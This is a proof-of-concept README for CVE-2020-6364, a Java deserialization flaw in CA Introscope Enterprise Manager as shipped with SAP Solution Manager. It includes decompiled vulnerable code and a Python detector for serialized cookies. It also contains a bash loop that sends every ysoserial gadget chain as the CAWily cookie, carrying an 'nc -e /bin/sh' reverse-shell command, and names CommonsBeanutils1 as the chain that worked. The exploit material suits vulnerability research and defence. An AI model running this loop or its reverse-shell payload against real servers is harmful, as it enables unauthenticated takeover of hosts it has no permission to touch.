
CVE-2020-6364 PoC — OS command injection vulnerability in SAP Solution Manager and SAP Focused Run

Source
Associated Vulnerability
Title: OS command injection vulnerability in SAP Solution Manager and SAP Focused Run (CVE-2020-6364)
Description: SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7) allow an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager, leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.
Description
Remote code execution in CA APM Team Center (Wily Introscope)
Readme
# CVE-2020-6364
Remote code execution in CA APM Team Center (Wily Introscope).

[Original advisory](https://github.com/Onapsis/vulnerability_advisories/blob/main/2021/CVE-2020-6364/ONAPSIS-2021-0008-OS_Command_Injection_in_CA_Introscope_Enterprise_Manager.md)

A deserialization vulnerability in CA APM Team Center leads to unauthenticated remote code execution on the server.

After authenticating to the server, a cookie is set whose value starts with the infamous ```rO0``` string: that is the base64 encoding of the Java serialization stream magic (```0xAC 0xED```), so the cookie is a base64-encoded serialized Java object:
![](./cookie.png)

Although I haven't fully traced the problem statically, this is probably the vulnerable code:
```java
import java.io.Externalizable;
import java.io.IOException;
import java.io.ObjectInput;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;

// Decompiled from the Enterprise Manager. Field declarations are reconstructed
// from their use below; Cookie is the product's own class and writeExternal()
// is omitted from the decompiled snippet.
public class HttpRequestHeaderInfo implements Externalizable {
  private static final Cookie[] kNoCookies = new Cookie[0];
  private Map fRequestParameterMap;
  private Cookie[] fCookies;

  public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {

    in.readInt();                      // discarded
    int numMapEntries = in.readInt();  // attacker-controlled count
    this.fRequestParameterMap = (numMapEntries == 0) ? Collections.EMPTY_MAP : new HashMap(numMapEntries);

    for (int i = 0; i < numMapEntries; i++) {
      // each map value is deserialized with no type restriction at all
      this.fRequestParameterMap.put(in.readUTF(), in.readObject());
    }

    int numCookies = in.readInt();
    this.fCookies = (numCookies == 0) ? kNoCookies : new Cookie[numCookies];

    for (int j = 0; j < this.fCookies.length; j++) {
      // readObject() runs before the (String) cast, so a gadget chain fires
      // even though the cast would fail afterwards
      this.fCookies[j] = new Cookie((String)in.readObject(), (String)in.readObject());
    }
  }
}
```

Notice that both the parameter-map values and the cookie name/value pairs are read with ```readObject()``` straight from the attacker-supplied stream, and each call runs before the ```(String)``` cast, so an arbitrary object graph is reconstructed (and any gadget chain it carries executes) whether or not the cast would fail later.
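As an added example (not code from the PoC repository, the advisory or the product), the cookie observation above translates into a small detector: it pulls every cookie out of a Cookie header, decodes the ones that start with ```rO0```, confirms the ```0xACED0005``` stream magic, reads the top-level class descriptor, scans the stream for every class descriptor it contains and flags names belonging to ysoserial's CommonsBeanutils1 chain (PriorityQueue plus BeanComparator). The sample streams are hand-built approximations that carry real headers and class descriptors but not the full object data, and the ```HttpRequestHeaderInfo``` class name is used without its package, which the README does not give.

```python
"""Flag Cookie headers that carry a Java serialization stream (added example)."""
import base64
import binascii
import re
import struct

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"          # STREAM_MAGIC + STREAM_VERSION
TC_NULL, TC_CLASSDESC, TC_OBJECT, TC_ENDBLOCKDATA = 0x70, 0x72, 0x73, 0x78
SC_SERIALIZABLE, SC_EXTERNALIZABLE, SC_BLOCKDATA = 0x02, 0x04, 0x08

# Only accept plausible fully-qualified Java class (or object-array) names.
CLASS_NAME_RE = re.compile(rb"^(\[+L)?[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*;?$")

# Root classes of ysoserial's CommonsBeanutils1 chain; extend per environment (assumption).
GADGET_CLASSES = {"java.util.PriorityQueue", "org.apache.commons.beanutils.BeanComparator"}


def decode_cookie_value(value: str):
    """Base64-decode a cookie value (padding tolerant); None if it is not base64."""
    try:
        return base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
    except (binascii.Error, ValueError):
        return None


def _read_utf(buf: bytes, pos: int):
    """Read a Java modified-UTF string: 2-byte big-endian length, then bytes."""
    (n,) = struct.unpack_from(">H", buf, pos)
    end = pos + 2 + n
    if end > len(buf):
        raise struct.error("truncated UTF string")
    return buf[pos + 2:end], end


def top_level_class(stream: bytes):
    """Strict header parse: magic, TC_OBJECT, TC_CLASSDESC, className."""
    if not stream.startswith(JAVA_STREAM_MAGIC):
        return None
    if stream[4:6] != bytes([TC_OBJECT, TC_CLASSDESC]):
        return None
    try:
        name, _ = _read_utf(stream, 6)
    except struct.error:
        return None
    return name.decode("utf-8", "replace")


def all_class_names(stream: bytes):
    """Heuristic scan: every TC_CLASSDESC byte followed by a plausible class name.
    0x72 is also ASCII 'r', so the regex and length check reject false reads."""
    found = []
    i = stream.find(bytes([TC_CLASSDESC]), 4)
    while i != -1:
        try:
            name, _ = _read_utf(stream, i + 1)
            if CLASS_NAME_RE.match(name) and name.decode() not in found:
                found.append(name.decode())
        except struct.error:
            pass
        i = stream.find(bytes([TC_CLASSDESC]), i + 1)
    return found


def parse_cookie_header(header: str):
    """'Cookie: a=b; c=d' -> [('a', 'b'), ('c', 'd')]; split on the first '=' only."""
    _, _, body = header.partition(":")
    pairs = []
    for part in body.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            pairs.append((name, value))
    return pairs


def inspect_cookie_header(header: str):
    """One finding per cookie whose value decodes to a Java serialization stream."""
    findings = []
    for name, value in parse_cookie_header(header):
        if not value.startswith("rO0"):          # cheap prefilter: base64 of AC ED 00
            continue
        raw = decode_cookie_value(value)
        if raw is None or not raw.startswith(JAVA_STREAM_MAGIC):
            continue
        classes = all_class_names(raw)
        findings.append({"cookie": name, "top_class": top_level_class(raw),
                         "classes": classes,
                         "gadget_hit": sorted(GADGET_CLASSES.intersection(classes))})
    return findings


def _class_desc(name: bytes, flags: int) -> bytes:
    """Constructed minimal classDesc: arbitrary SUID, zero fields, no superclass."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
            + struct.pack(">q", 0x1234) + bytes([flags]) + struct.pack(">H", 0)
            + bytes([TC_ENDBLOCKDATA, TC_NULL]))


# Constructed samples: the product's own header object (package unknown, placeholder
# name) and a PriorityQueue/BeanComparator stream shaped like CommonsBeanutils1.
BENIGN_STREAM = (JAVA_STREAM_MAGIC + bytes([TC_OBJECT])
                 + _class_desc(b"HttpRequestHeaderInfo", SC_EXTERNALIZABLE | SC_BLOCKDATA)
                 + bytes([TC_ENDBLOCKDATA]))
GADGET_STREAM = (JAVA_STREAM_MAGIC + bytes([TC_OBJECT])
                 + _class_desc(b"java.util.PriorityQueue", SC_SERIALIZABLE)
                 + struct.pack(">i", 2) + bytes([TC_OBJECT])
                 + _class_desc(b"org.apache.commons.beanutils.BeanComparator", SC_SERIALIZABLE))
SAMPLE_HEADERS = [
    "Cookie: JSESSIONID=0123ABCD; CAWily=" + base64.b64encode(BENIGN_STREAM).decode(),
    "Cookie: CAWily=" + base64.b64encode(GADGET_STREAM).decode() + "; theme=dark",
    "Cookie: CAWily=rO0tYW5kLXJvbGw=",        # starts with rO0 but is not a Java stream
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(inspect_cookie_header(h))
```

A legitimate session cookie parses to the product's own header class, while a ysoserial payload parses to the chain's root object, which makes the top-level class a cheap thing to log or block on this cookie name; cookies that are URL-encoded on the wire need a ```urllib.parse.unquote``` before the base64 step.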

This is trivially exploited by trying each ysoserial gadget chain in turn. Note that the loop sends the raw ysoserial output as the whole cookie value, so the gadget chain is the top-level object in the stream: the cookie must reach an unfiltered ```readObject()``` directly, without having to be wrapped in an ```HttpRequestHeaderInfo```.
```bash
# Send every ysoserial gadget chain as the CAWily cookie value; the one that
# calls back to the listener tells you which gadget library the server ships.
for gadget in AspectJWeaver BeanShell1 C3P0 Click1 Clojure CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 CommonsCollections7 FileUpload1 Groovy1 Hibernate1 Hibernate2 JBossInterceptors1 JRMPClient JRMPListener JSON1 JavassistWeld1 Jdk7u21 Jython1 MozillaRhino1 MozillaRhino2 Myfaces1 Myfaces2 ROME Spring1 Spring2 URLDNS Vaadin1 Wicket1
do
    echo "[*] trying $gadget"
    # the serialized gadget object is the entire cookie value: no wrapper object is needed
    java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar "$gadget" "nc -e /bin/sh ..." | base64 -w0 > cookie
    payload=$(cat cookie)
    curl -s -k 'https://remoteserver/' -X POST -H "Cookie: CAWily=$payload" -o /dev/null
done
```

The only payload that produced remote code execution for me was CommonsBeanutils1. The JAR embedded in the product is ```org.apache.commons_beanutils_1.9.2.1.jar```, and commons-beanutils 1.9.2 is exactly the library that chain is built on; the [maven repository](https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils/1.9.2) entry confirms the version is affected.

Thanks
======
Obligatory thanks to a special someone who had me double check the header.
File Snapshot

```text
/data/pocs/6c65f475d3d8c618228dee556b0aea6e840ac88e
├── cookie.png   (198K)
└── README.md    (2.5K)

0 directories, 2 files
```